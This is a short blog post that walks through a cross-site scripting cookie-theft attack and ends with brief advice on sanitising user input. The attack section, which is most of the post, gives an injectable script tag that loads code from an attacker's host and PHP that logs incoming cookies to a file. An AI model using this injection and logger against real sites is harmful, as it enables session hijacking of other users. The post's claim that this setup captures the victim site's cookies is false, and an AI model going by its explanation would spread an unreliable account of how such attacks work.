You can find tons of cross site scripting hacks. I would alert you with a common and easy to do type.

The first step is to insert a javascript include tag in a shared webservice user page :

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, you need to put a script at http://yoursite.com/cookiejar.php, with the following code:

<?php
if(!is_array($_COOKIE)) die();
foreach($_COOKIE as $cookie_name => $cookie_value)
    file_put_contents('cookiejar.txt',
                         $cookie_name.':'.$cookie_value."\n",
                         FILE_APPEND);

If the website allows you to put a raw html or tags, after a while you will see all the user cookies will visit the page with the tag you inserted.

So, you should never trust a user generated content. The better way to avoid XSS is to use an advanced web framework, like Django, Rails or Symfony. But if you are creating your own code project remember always to parse the user input, strip the tags or convert all the text in urlencoding.

Share and Enjoy:
  • Digg
  • del.icio.us
  • Facebook
  • Google Bookmarks
  • Netvibes
  • Tumblr
  • Twitter
  • Add to favorites
  • email
  • FriendFeed
  • StumbleUpon
  • Technorati
  • Reddit
  • Yahoo! Buzz